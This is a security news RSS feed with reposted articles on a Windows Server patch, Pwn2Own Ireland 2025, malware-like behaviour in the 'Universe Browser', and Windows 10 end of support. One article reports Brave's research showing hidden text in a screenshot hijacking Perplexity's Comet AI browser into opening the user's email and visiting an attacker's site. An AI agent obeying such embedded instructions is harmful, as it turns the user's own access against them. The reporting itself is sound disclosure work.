<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/15/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>Microsoft shares Windows Server KB5070881 KB5070879 KB5070884 OOB updates for CVE-2025-59287</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-shares-windows-server-kb5070881-kb5070879-kb5070884-oob-updates-for-cve-2025-59287-r32051/</link><description><![CDATA[<p>
	Microsoft earlier today released emergency patches for a remote code execution security vulnerability on all supported Windows Server versions. Remote Code execution (RCE) attacks are a fairly dangerous cyberattack technique as threat actors do not require physical access to hardware to run malicious code intended to harm the victims.
</p>

<p>
	 
</p>

<p>
	The security flaw tracked under ID CVE-2025-59287 is affecting the Windows Server Update Services (WSUS) though Microsoft does not that servers that do not have the WSUS server role enabled are not vulnerable to this exploit. The emergency out-of-band (OOB) update, <a automate_uuid="faff3cd3-cece-4987-9473-6cfa30d378ad" href="https://www.neowin.net/news/microsoft-releases-kb5070762-windows-11-25h2-24h2-emergency-recovery-update/" rel="external nofollow">the second this month</a>, is now out and the company notes that this is cumulative in nature too just like other Windows updates, which means admins and users will not need to install any other previous update before installing this OOB update.
</p>

<p>
	 
</p>

<p>
	Microsoft writes: "An out-of-band (OOB) update was released today, October 23, 2025, to address this issue. This is a cumulative update, so you do not need to apply any previous updates before installing this update, as it supersedes all previous updates for affected versions. If you haven’t installed the October 2025 Windows security update yet, we recommend you apply this OOB update instead."
</p>

<p>
	 
</p>

<ul>
	<li>
		<p>
			Windows Server 2025 (KB5070881)
		</p>
	</li>
	<li>
		<p>
			Windows Server, version 23H2 (KB5070879)
		</p>
	</li>
	<li>
		<p>
			Windows Server 2022 (KB5070884)
		</p>
	</li>
	<li>
		<p>
			Windows Server 2019 (KB5070883)
		</p>
	</li>
	<li>
		<p>
			Windows Server 2016 (KB5070882)
		</p>
	</li>
	<li>
		<p>
			Windows Server 2012 R2 (KB5070886)
		</p>
	</li>
	<li>
		<p>
			Windows Server 2012 (KB5070887)
		</p>

		<p>
			 
		</p>
	</li>
</ul>

<p>
	Micosoft notes that these updates are downloaded and installed automatically.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/microsoft-shares-windows-server-kb5070881-kb5070879-kb5070884-oob-updates-for-cve-2025-59287/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Friday 24 October 2025 at 6:11 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32051</guid><pubDate>Fri, 24 Oct 2025 08:12:26 +0000</pubDate></item><item><title>Hackers earn $1,024,750 for 73 zero-days at Pwn2Own Ireland</title><link>https://nsaneforums.com/news/security-privacy-news/hackers-earn-1024750-for-73-zero-days-at-pwn2own-ireland-r32048/</link><description><![CDATA[<p>
	The Pwn2Own Ireland 2025 hacking competition has ended with security researchers collecting $1,024,750 in cash awards after exploiting 73 zero-day vulnerabilities.
</p>

<p>
	 
</p>

<p>
	At Pwn2Own Ireland 2025, competitors <a href="https://www.zerodayinitiative.com/blog/2025/7/30/pwn2own-returns-to-ireland-with-a-one-million-dollar-whatsapp-target" rel="external nofollow" target="_blank">targeted products in eight categories</a>, including printers, network storage systems, messaging apps, smart home devices, surveillance equipment, home networking equipment, flagship smartphones (Apple iPhone 16, Samsung Galaxy S25, and Google Pixel 9), and wearable technology (including Meta's Ray-Ban Smart Glasses and Quest 3/3S headsets).
</p>

<p>
	 
</p>

<p>
	This year's contest also expanded the attack surface to include USB port exploitation on mobile handsets, requiring researchers to hack locked devices via a physical connection. However, traditional wireless protocols like Bluetooth, Wi-Fi, and NFC (near-field communication) remained valid attack vectors.
</p>

<p>
	 
</p>

<p>
	The hacking contest, co-sponsored by Meta alongside QNAP and Synology, took place from October 21 to October 23 in Cork, Ireland.
</p>

<p>
	 
</p>

<p>
	Summoning Team won this year's edition of Pwn2Own Ireland with 22 Master of Pwn points and $187,500 earned throughout the three-day event after hacking the Samsung Galaxy S25, the Synology DiskStation DS925+ NAS, the Home Assistant Green, the Synology ActiveProtect Appliance DP320 NAS drive, the Synology CC400W camera, and the QNAP TS-453E NAS device.
</p>

<p>
	 
</p>

<p>
	Team ANHTUD secured the second position with $76,750 and 11.5 Master of Pwn points, while Team Synactiv took third place with $90,000 in prizes and 11 Master of Pwn points.
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Final Pwn2Own leaderboard" class="ipsImage" height="405" width="720" src="https://www.bleepstatic.com/images/news/u/1109292/2025/Pwn2Own-Ireland-Leaderboard.webp">
		<figcaption>
			<em>Final Pwn2Own leaderboard (ZDI)</em>
		</figcaption>
	</figure>
</div>

<p>
	On the first day of Pwn2Own Ireland, hackers <a href="https://www.bleepingcomputer.com/news/security/hackers-exploit-34-zero-days-on-first-day-of-pwn2own-ireland/" rel="external nofollow" target="_blank">exploited 34 unique zero-days</a> and collected $522,500 in cash awards. On the second day of the event, they <a href="https://www.bleepingcomputer.com/news/security/samsung-galaxy-s25-hacked-on-day-two-of-pwn2own-ireland-2025/" rel="external nofollow" target="_blank">demoed another 22 unique zero-day vulnerabilities</a> for $267.500.
</p>

<p>
	 
</p>

<p>
	The highlight of the last day was the <a href="https://bsky.app/profile/thezdi.bsky.social/post/3m3u364klok27" rel="external nofollow" target="_blank">Samsung Galaxy S25 getting hacked by Interrupt Labs' team</a> via an improper input validation bug, who earned 5 Master of Pwn points and $50,000 after also enabling location tracking and the camera in the process.
</p>

<p>
	 
</p>

<p>
	While Team Z3 was also scheduled today to demonstrate a WhatsApp Zero-Click remote code execution zero-day, eligible for <a href="https://www.bleepingcomputer.com/news/security/pwn2own-hacking-contest-pays-1-million-for-whatsapp-exploit/" rel="external nofollow" target="_blank">a $1 million reward</a>, they <a href="https://x.com/thezdi/status/1981419691068575885" rel="external nofollow" target="_blank">withdrew from the competition</a>. They chose to disclose their findings privately to ZDI analysts before sharing their research with Meta's engineering team.
</p>

<p>
	 
</p>

<p>
	The Zero Day Initiative (ZDI) organizes this hacking contest to identify security vulnerabilities before threat actors can exploit them in attacks and coordinate responsible disclosure with the affected vendors. 
</p>

<p>
	 
</p>

<p>
	After the zero-days are exploited at Pwn2Own, the vendors have 90 days to release patches before Trend Micro's Zero Day Initiative publicly discloses them.
</p>

<p>
	 
</p>

<p>
	In January 2026, the ZDI will once again be at the Automotive World technology show in Tokyo, Japan, <a href="https://www.zerodayinitiative.com/blog/2025/10/16/pwn2own-automotive-returns-to-tokyo-with-expanded-chargers-and-more" rel="external nofollow" target="_blank">for the third Pwn2Own Automotive contest</a>, again sponsored by Tesla
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/hackers-earn-1-024-750-for-73-zero-days-at-pwn2own-ireland/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Friday 24 October 2025 at 6:06 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32048</guid><pubDate>Fri, 24 Oct 2025 08:07:16 +0000</pubDate></item><item><title>Researchers Find Severe Vulnerabilities in AI Browser</title><link>https://nsaneforums.com/news/security-privacy-news/researchers-find-severe-vulnerabilities-in-ai-browser-r32038/</link><description><![CDATA[<p>
	A hype cycle as overwhelming and logic-defying as the AI boom comes with its own whirlwind succession of trends that are their own mini booms driven by billions of dollars of money.
</p>

<p>
	 
</p>

<p>
	Once the world got used to large language model-powered AI chatbots, autonomous AI agents became the next big thing. This past year, video generating models have been having their time in the Sun after rapid improvements. What will be the next hot trend? So-called “world models” that can simulate physical environments?
</p>

<p>
	 
</p>

<p>
	Maybe. But for now, instead, it’s “AI browsers” designed to supercharge your web experience with machine learning features.
</p>

<p>
	 
</p>

<p>
	OpenAI is currently trying to will this trend into existence with the release of its own web browser called “ChatGPT Atlas,” which it announced Tuesday. It reeks of a company bereft of exciting ideas, sure, but if anyone can make it a thing, it would be the makers of the world’s most popular chatbot.
</p>

<p>
	 
</p>

<p>
	New research from the web browser company Brave, however, should dampen the enthusiasm for the tech. In a report released Tuesday, the company outlined glaring security flaws with Perplexity’s Comet Browser, which allows users to take screenshots on websites so a built-in AI can analyze them and answer questions. According to Brave’s findings, the screenshot feature can be a vector for an attack known as a prompt injection, in which a hacker delivers a hidden message to an AI to carry out harmful instructions. These messages can be embedded in malicious webpages designed by the hacker.
</p>

<p>
	 
</p>

<p>
	In a video demonstration, the Perplexity AI browser is asked “Who is the author?” of a screenshot of a photograph. Within seconds, the AI opens the user’s personal email and visits a website setup by a hacker. The photograph, it turned out, contained text instructions imperceptible to the human eye — but the AI extracted and followed them without distinguishing it from the user’s prompt, according to the researchers.
</p>

<p>
	 
</p>

<p>
	“The scariest aspect of these security flaws is that an AI assistant can act with the user’s authenticated privileges,” Brave warned. “An agentic browser hijacked by a malicious site can access a user’s banking, work email or other sensitive accounts.”
</p>

<p>
	 
</p>

<p>
	Prompt injection attacks aren’t new, and have been a cause for concern ever since ChatGPT exploded the popularity of LLMs.
</p>

<p>
	But the stakes of the havoc they can wreak have been raised with the advent of autonomous AI models, or agents, that can control a user’s desktop unlike a typical chatbot, enabling them to browse the web and access and change files. 
</p>

<p>
	 
</p>

<p>
	Now with AI browsers on the horizon, countless more users are just a button-click away from being exposed to these risks that they’re likely oblivious to. A previous report from Brave showed how another prompt injection attack tricked Perplexity’s Comet browser into potentially giving hackers access to your bank account by showing it a single Reddit post.
</p>

<p>
	 
</p>

<p>
	“AI-powered browsers that can take actions on your behalf are powerful yet extremely risky,” the report warned. The attacks “boil down to a failure to maintain clear boundaries between trusted user input and untrusted Web content when constructing LLM prompts while allowing the browser to take powerful actions on behalf of the user.”
</p>

<p>
	 
</p>

<p>
	These are problems inherent both to LLMs and their questionable wedding with a web browser. In other words, expect these same vulnerabilities to show up in OpenAI’s AI browser, too — only with millions of more people exposed to them.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://futurism.com/artificial-intelligence/researchers-severe-vulnerabilities-ai-browser-comet" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32038</guid><pubDate>Thu, 23 Oct 2025 21:38:31 +0000</pubDate></item><item><title>This &#x2018;Privacy Browser&#x2019; Has Dangerous Hidden Features</title><link>https://nsaneforums.com/news/security-privacy-news/this-%E2%80%98privacy-browser%E2%80%99-has-dangerous-hidden-features-r32036/</link><description><![CDATA[<p>
	<strong>The Universe Browser is believed to have been downloaded millions of times. But researchers say it behaves like malware and has links to Asia’s booming cybercrime and illegal gambling networks.</strong>
</p>

<p>
	 
</p>

<p>
	The Universe Browser makes some big promises to its potential users. Its online advertisements claim it’s the “fastest browser,” that people using it will “avoid privacy leaks” and that the software will help “keep you away from danger.” However, everything likely isn’t as it seems.
</p>

<p>
	 
</p>

<p>
	The browser, which is linked to Chinese online gambling websites and is thought to have been downloaded millions of times, actually routes all internet traffic through servers in China and “covertly installs several programs that run silently in the background,” according to new findings from network security company Infoblox. The researchers say the “hidden” elements include features similar to malware—including “key logging, surreptitious connections,” and changing a device’s network connections.
</p>

<p>
	 
</p>

<p>
	Perhaps most significantly, the Infoblox researchers who collaborated with the United Nations Office on Drugs and Crime (UNODC) on the work, found links between the browser’s operation and Southeast Asia’s sprawling, multibillion-dollar cybercrime ecosystem, which has connections to money-laundering, illegal online gambling, human trafficking, and scam operations that use forced labor. The browser itself, the researchers says, is directly linked to a network around major online gambling company BBIN, which the researchers have labeled a threat group they call Vault Viper.
</p>

<p>
	 
</p>

<p>
	The researchers say the discovery of the browser—plus its suspicious and risky behavior—indicates that criminals in the region are becoming increasingly sophisticated. “These criminal groups, particularly Chinese organized crimes syndicates, are increasingly diversifying and evolving into cyber enabled fraud, pig butchering, impersonation, scams, that whole ecosystem,” says John Wojcik, a senior threat researcher at Infoblox, who also worked on the project when he was a staff member at the UNODC.
</p>

<p>
	 
</p>

<p>
	“They’re going to continue to double down, reinvest profits, develop new capabilities,” Wojcik says. “The threat is ultimately becoming more serious and concerning, and this is one example of where we see that.”
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>Under the Hood</strong></span>
</p>

<p>
	 
</p>

<p>
	The Universe Browser was first spotted—and mentioned by name—by Infoblox and UNODC at the start of this year when they began unpacking the digital systems around an online casino operation based in Cambodia, which was previously raided by law enforcement officials. Infoblox, which specializes in domain name system (DNS) management and security, detected a unique DNS fingerprint from those systems that they linked to Vault Viper, making it possible for the researchers to trace and map websites and infrastructure linked to the group.
</p>

<p>
	 
</p>

<p>
	Tens of thousands of web domains, plus various command-and-control infrastructure and registered companies, are linked to Vault Viper activity, Infoblox researchers say in a report shared with WIRED. They also say they examined hundreds of pages of corporate documents, legal records, and court filings with links to BBIN or other subsidiaries. Time and time again, they came across the Universe Browser online.
</p>

<p>
	 
</p>

<p>
	“We haven’t seen the Universe Browser advertised outside of the domains Vault Viper controls,” says Maël Le Touz, a threat researcher at Infoblox. The Infoblox report says the browser was “specifically” designed to help people in Asia—where online gambling is largely illegal—bypass restrictions. “Each of the casino websites they operate seem to contain a link and advertisement to it,” Le Touz says.
</p>

<p>
	<br />
	The Universe Browser itself is mostly offered for direct download from these casino websites—often being linked at the bottom of the websites, next to the logo of BBIN. There are desktop versions available for Windows, as well as an app version in Apple’s App Store. And while it is not in Google’s Play Store, there are Android APK files that allow the app to be directly installed on Android phones. The researchers say multiple parts of the Universe Browser and the code for its apps reference BBIN, and other technical details also reference the company.
</p>

<p>
	 
</p>

<p>
	The researchers reverse-engineered the Windows version of the browser. They say that while they have been unable to “verify malicious intent,” elements of the browser that they uncovered include many features that are similar to those found malware and tries to evade detection by antivirus tools. When the browser is launched, it “immediately” checks for the user's location, language, and whether it is running in a virtual machine. The app also installs two browser extensions: one of which can allow screenshots to be uploaded to domains linked to the browser.
</p>

<p>
	 
</p>

<p>
	While online gambling in China is largely illegal, the country also runs some of the world’s strictest online censorship operations and has taken action against illegal gambling rings. While the browser may most often be being used by those trying to take part in illegal gambling, it also puts their data at risk, the researchers say. “In the hands of a malicious actor—a Triad for example—this browser would serve as the perfect tool to identify wealthy players and obtain access to their machine,” the Infoblox report says.
</p>

<p>
	 
</p>

<p>
	Beyond connecting to China, running key logging, and other programs that run in the background, Infoblox’s report also says multiple functions have been disabled. “The right click, settings access and developer tools, for instance, have all been removed, while the browser itself is run with several flags disabling major security features including sandboxing, and the removal of legacy SSL protocols, greatly increasing risk when compared with typical mainstream browsers,” the company’s report says. (SSL, also known as Secure Sockets Layer, is a historic type of web encryption that protected some data transfers.)
</p>

<p>
	 
</p>

<p>
	It is unclear whether these same suspicious behaviors are present in the iOS and Android versions of the app. A Google spokesperson says the company is looking into the app and confirmed it was not available through its Google Play store. Apple did not respond to requests for comment about the app.
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>Connect the Dots</strong></span>
</p>

<p>
	 
</p>

<p>
	The web infrastructure around the Universe Browser led the researchers back to BBIN, a company that has existed since 1999. While it was originally founded in Taiwan, the company now has a large base in the Philippines.
</p>

<p>
	 
</p>

<p>
	BBIN, which also goes by the name Baoying Group and has multiple subsidies, describes itself as a “leading” supplier of iGaming software in Asia. A UNODC report from April, which links BBIN to the Universe Browser but does not formally name the company as Vault Viper, says the firm runs several hotels and casinos in Southeast Asia as well as providing “one of the largest and most successful” iGaming platforms in the region. Over the last decade, BBIN has sponsored or partnered with multiple major European soccer teams, such as Spain’s Atlético de Madrid, Germany’s Borussia Dortmund, and Dutch team AFC Ajax.
</p>

<p>
	 
</p>

<p>
	In recent years, multiple football clubs in England’s Premier League have faced scrutiny over sponsorship by Asian gambling companies—including by TGP Europe which was owned by Alvin Chau, the chairman and founder of SunCity Group who was sentenced in January 2023 to 18 years in prison after being found guilty of running illegal gambling operations. TGP Europe left the UK earlier this year after being fined by the country’s gambling regulator. Atlético Madrid, Borussia Dortmund, and AFC Ajax did not respond to WIRED requests for comment.
</p>

<p>
	 
</p>

<p>
	The iGaming industry develops online gambling software, such as virtual poker or other online casino games, that can easily be played on the web or on phones. “BBIN Baoying is officially an online casino game developer or ‘white label’ online casino platform, meaning it outsources its online gambling technology to other sites,” says Lindsey Kennedy, research director at The EyeWitness Project, which investigates corruption and organized crime. “The only languages it offers are Korean, Japanese and Chinese, which isn’t a great sign as online gambling is either banned or heavily restricted in all three countries.”
</p>

<p>
	 
</p>

<p>
	“Baoying and BBIN are what I would call a multi-billion dollar gray-area international conglomerate with deep criminal connections, backstopping and providing services to online gambling businesses, scams and cybercrime actors,” alleges Jeremy Douglas, chief of staff at the UNODC and its former regional representative for Southeast Asia. “Aside from what has been estimated at a two-thirds ownership by Alvin Chau of SunCity—arguably the biggest money launderer in the history of Asia—law enforcement partners have documented direct connections with Triad groups including the Bamboo Union, Four Seas, Tian Dao,” Douglas says of BBIN. (When Chau was sentenced in January 2023, court documents pointed to him allegedly owning a 66.67 percent share of Baoying).
</p>

<p>
	 
</p>

<p>
	BBIN did not respond to multiple requests for comment from WIRED. The firm’s primary contact email address it lists on its website bounced back, while questions sent to another email address and online contact forms, plus attempts to contact two alleged staff members on LinkedIn were not answered by the time of publication. A company Telegram account pointed WIRED to one of the contact forms that did not provide any answers.
</p>

<p>
	 
</p>

<p>
	The Presidential Anti-Organized Crime Commission (PAOCC) in the Philippines, which tackles organized and international crimes, did not respond to a request for comment from WIRED about BBIN.
</p>

<p>
	 
</p>

<p>
	Over the last decade, online crime in Southeast Asia has massively surged, driven partially by illegal online gambling and also a series of scam compounds that have been set up across Myanmar, Laos, and Cambodia. Hundreds of thousands of people from more than 60 countries have been tricked into working in these compounds, where they operate scams day and night, stealing billions of dollars from people around the world.
</p>

<p>
	 
</p>

<p>
	“Scam parks and compounds across the region generally host both online gambling and online scam operations, and the methodology used to lure individuals into opening online gambling accounts parallels that associated with pig-butchering scams,” says Jason Tower, a senior expert at the Global Initiative Against Transnational Organized Crime.
</p>

<p>
	<br />
	Last week, US law enforcement seized $15 billion in Bitcoin from one giant Cambodian organization, which publicly dealt in real estate but allegedly ran scam facilities in “secret.” One of the sanctioned entities, the Jin Bei Group in Cambodia, which US authorities accused of operating a series of scam compounds, also shows links to BBIN’s technology, Tower says. “There are multiple Telegram groups and casino websites indicating that BBIN partners with multiple entities inside the Jinbei casino,” Tower says, adding that one group on Telegram “posts daily advertisements indicating an official partnership between Jinbei and BBIN.”
</p>

<p>
	 
</p>

<p>
	Over recent years, multiple government press releases and news reports from countries including China and Taiwan, have alleged how BBIN’s technology has been used within illegal gambling operations and linked to cybercrime. “There are hundreds of Telegram posts aggressively advertising various illegal Chinese facing gambling sites that say they either are, or are built on, BBIN/Baoying technology, many of them by individuals claiming to operate out of scam and illegal gambling compounds, or as part of the highly illegal, trafficking-driven industry in Cambodia and Northern Myanmar,” says Kennedy from The EyeWitness Project.
</p>

<p>
	 
</p>

<p>
	While the Universe Browser has most likely been downloaded by those accessing Chinese-language gambling websites, researchers say that its development indicates how pivotal and lucrative illegal online gambling operations are and exposing their links to scamming efforts that operate across the world. “As these operations continue to scale and diversify, they are marked by growing technical expertise, professionalization, operational resilience, and the ability to function under the radar with very limited scrutiny and oversight,” Infoblox’s report concludes.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.wired.com/story/universe-browser-malware-gambling-networks/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32036</guid><pubDate>Thu, 23 Oct 2025 21:29:40 +0000</pubDate></item><item><title>Microsoft warns of potential cybersecurity disaster if you stay on Windows 10</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-warns-of-potential-cybersecurity-disaster-if-you-stay-on-windows-10-r32032/</link><description><![CDATA[<p>
	<a automate_uuid="ab87ffb9-b81e-484d-8c22-c02e8c6eac4a" href="https://www.neowin.net/news/kb5066791-microsoft-shares-details-on-windows-10-support-end-with-final-october-2025-patch/" rel="external nofollow">Support for Windows 10 ended about 10 days ago</a>, but you can still stick with the OS either through the Extended Security Updates (ESU) program or by just not caring about security updates at all. That said, Microsoft is trying hard to encourage people to <a automate_uuid="190e6b79-86c1-4b4e-81ed-f9a7490144e5" href="https://www.neowin.net/news/microsoft-lets-every-windows-10-and-11-user-upgrade-to-windows-11-25h2-on-supported-pcs/" rel="external nofollow">upgrade to Windows 11 as quickly as possible</a>. To that end, it recently published a blog post warning about the dangers of staying on unsupported systems like Windows 10.
</p>

<p>
	 
</p>

<p>
	Microsoft's latest write-up is available on the rather obscure <a automate_uuid="21e7d08d-a627-4e66-9de8-859998580987" href="https://www.microsoft.com/en-us/windows/business/knowledge-center/unsupported-systems-security-risks" rel="external nofollow">Windows for Business blog</a>, and it highlights how weaknesses in your IT infrastructure can be exploited by malicious actors. The company has emphasized that the end of support for software like Windows 10 does not only mean outdated, but it also means that your system is unprotected. Interestingly, the piece doesn't touch upon the topics of ESU or <a automate_uuid="7b167b8f-2211-499e-8534-4ba5542346f2" href="https://www.neowin.net/news/support-for-windows-10-has-ended-but-microsoft-defender-will-continue-to-protect-your-pc/" rel="external nofollow">Microsoft Defender's continued protection</a> at all.
</p>

<p>
	 
</p>

<p>
	Since it ignores ESU and Microsoft Defender altogether, the blog tries to make the case that legacy systems, which do not receive regular updates, just receive band-aid fixes, which are often not enough. Microsoft cites its own report, which indicates that 90% of ransomware attacks happen due to unmanaged devices that don't have proper security controls configured. The company has noted that outdated systems like Windows 10 create the following blind spots:
</p>

<p>
	 
</p>

<ul>
	<li>
		Endpoint security gaps
	</li>
	<li>
		Compliance and audit risks
	</li>
	<li>
		Access control vulnerabilities
	</li>
	<li>
		Data governance breakdowns
	</li>
</ul>

<p>
	 
</p>

<p>
	Microsoft went on to highlight the gravity of this cybersecurity threat even further by saying that:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		Hackers don’t need to break your strongest lock. They just need to wait until you leave a window open. With Windows 10 end of support on the horizon, attackers already know many businesses will lag behind. Every month of delay hands them a predictable advantage: a patchwork of unprotected systems running business-critical workloads.
	</p>

	<p>
		 
	</p>

	<p>
		The cost of waiting is steep. Breaches tied to unsupported infrastructure often carry higher remediation costs, longer downtime, and greater reputational damage than attacks on supported platforms. And because compliance frameworks evolve faster than legacy systems, staying put also means falling behind on requirements that affect contracts, customer trust, and even your ability to do business. 
	</p>
</blockquote>

<p>
	In light of this situation, Microsoft has advised customers to audit their environments, prioritize high-risk endpoints, strengthen temporary defenses in legacy systems, and plan migrations to modern alternatives. The Redmond tech giant believes that technical decision-makers need to be proactive in this regard and address legacy systems as soon as possible.
</p>

<p>
	 
</p>

<p>
	Of course, during all of this, Microsoft has also seen fit to promote the benefits of Windows 11, which includes Intel vPro hardware, Windows Hello for Business, the Secure Future Initiative (SFI), and Copilot+ PCs, which run AI workloads locally.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/microsoft-warns-of-potential-cybersecurity-disaster-if-you-stay-on-windows-10/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Friday 24 October 2025 at 3:18 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32032</guid><pubDate>Thu, 23 Oct 2025 17:18:40 +0000</pubDate></item><item><title>Pwn2Own Day 2: Hackers exploit 56 zero-days for $790,000</title><link>https://nsaneforums.com/news/security-privacy-news/pwn2own-day-2-hackers-exploit-56-zero-days-for-790000-r32023/</link><description><![CDATA[<p>
	Security researchers collected $792,750 in cash after exploiting 56 unique zero-day vulnerabilities during the second day of the Pwn2Own Ireland 2025 hacking competition.
</p>

<p>
	 
</p>

<p>
	Today's highlight was Ken Gannon of Mobile Hacking Lab and Dimitrios Valsamaras of Summoning Team hacking the Samsung Galaxy S25 <a href="https://x.com/thezdi/status/1981033789984801167" rel="external nofollow" target="_blank">with a chain of five security flaws</a>, earning $50,000 and 5 Master of Pwn points.
</p>

<p>
	 
</p>

<p>
	Also, while PHP Hooligans <a href="https://x.com/thezdi/status/1981010304969703511" rel="external nofollow" target="_blank">needed only a single second</a> to hack the QNAP TS-453E NAS device, the vulnerability they exploited had already been used in the contest.
</p>

<p>
	 
</p>

<p>
	Chumy Tsai of CyCraft Technology, Le Trong Phuc and Cao Ngoc Quy of Verichains Cyber Force, and Mehdi &amp; Matthieu of Synacktiv Team were also awarded $20,000 for breaking into the QNAP TS-453E, Synology DS925+, and the Phillips Hue Bridge.
</p>

<p>
	 
</p>

<p>
	The contestants also exploited zero-day bugs in the Canon imageCLASS MF654Cdw printer, Home Automation Green, Synology CC400W camera, Synology DS925+ NAS, Amazon Smart plug, and Lexmark CX532adwe printer.
</p>

<p>
	 
</p>

<p>
	Summoning Team is still <a href="https://x.com/thezdi/status/1981065822270607388" rel="external nofollow" target="_blank">at the top of the Master of Pwn leaderboard</a> with 18 points after earning $167,500 during the first two days of the event.
</p>

<p>
	 
</p>

<p>
	On <a href="https://www.bleepingcomputer.com/news/security/hackers-exploit-34-zero-days-on-first-day-of-pwn2own-ireland/" rel="external nofollow" target="_blank">the first day of Pwn2Own Ireland</a>, researchers demoed 34 unique zero-days and collected $522,500 in cash awards. After the competition ends, vendors have 90 days to release patches before ZDI publicly discloses the vulnerabilities.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.zerodayinitiative.com/blog/2025/20/pwn2own-ireland-2025-the-full-schedule#:~:text=Thursday%2C%20October%2023%20%E2%80%93%200930" rel="external nofollow" target="_blank">On the third and last day of Pwn2Own</a>, they will again target the Samsung Galaxy S25, as well as multiple NAS devices and printers. Eugene of Team Z3 will also attempt to demonstrate a WhatsApp Zero-Click remote code execution bug eligible for <a href="https://www.bleepingcomputer.com/news/security/pwn2own-hacking-contest-pays-1-million-for-whatsapp-exploit/" rel="external nofollow" target="_blank">a $1 million reward</a>. 
</p>

<p>
	 
</p>

<div class="ipsEmbeddedVideo" contenteditable="false">
	<div>
		<iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" frameborder="0" height="113" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube-nocookie.com/embed/LuzHcXruJF4?feature=oembed" title="Live from Pwn2Own Ireland: Summoning Team vs. Samsung Galaxy" width="200"></iframe>
	</div>
</div>

<p>
	 
</p>

<p>
	Meta is co-sponsoring Pwn2Own Ireland 2025 alongside Synology and QNAP, with the hacking contest taking place from October 21 to October 24 in Cork.
</p>

<p>
	 
</p>

<p>
	Pwn2Own Ireland 2025 <a href="https://www.zerodayinitiative.com/blog/2025/7/30/pwn2own-returns-to-ireland-with-a-one-million-dollar-whatsapp-target" rel="external nofollow" target="_blank">features eight categories</a> targeting flagship smartphones (Samsung Galaxy S25, Apple iPhone 16, and Google Pixel 9), printers, network storage systems, home networking equipment, messaging apps, smart home devices, surveillance equipment, and wearable technology (including Meta's Quest 3/3S headsets and Ray-Ban Smart Glasses).
</p>

<p>
	 
</p>

<p>
	This year's contest expands the attack vectors to include USB port exploitation on mobile handsets, requiring researchers to hack locked phones via a physical connection. However, traditional wireless protocols such as Wi-Fi, Bluetooth, and near-field communication (NFC) are still valid attack vectors.
</p>

<p>
	 
</p>

<p>
	During the Pwn2Own Ireland 2024 event, hackers <a href="https://www.bleepingcomputer.com/news/security/over-70-zero-day-flaws-get-hackers-1-million-at-pwn2own-ireland/" rel="external nofollow" target="_blank">earned $1,078,750</a> for over 70 zero-days, with Viettel Cyber Security taking home $205,000 in cash after exploiting QNAP, Sonos, and Lexmark flaws.
</p>

<p>
	 
</p>

<p>
	In January 2026, the ZDI will return to the Automotive World technology show in Tokyo <a href="https://www.zerodayinitiative.com/blog/2025/10/16/pwn2own-automotive-returns-to-tokyo-with-expanded-chargers-and-more" rel="external nofollow" target="_blank">for the third Pwn2Own Automotive contest, </a> again sponsored by Tesla
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/samsung-galaxy-s25-hacked-on-day-two-of-pwn2own-ireland-2025/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Thursday 23 October 2025 at 11:51 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
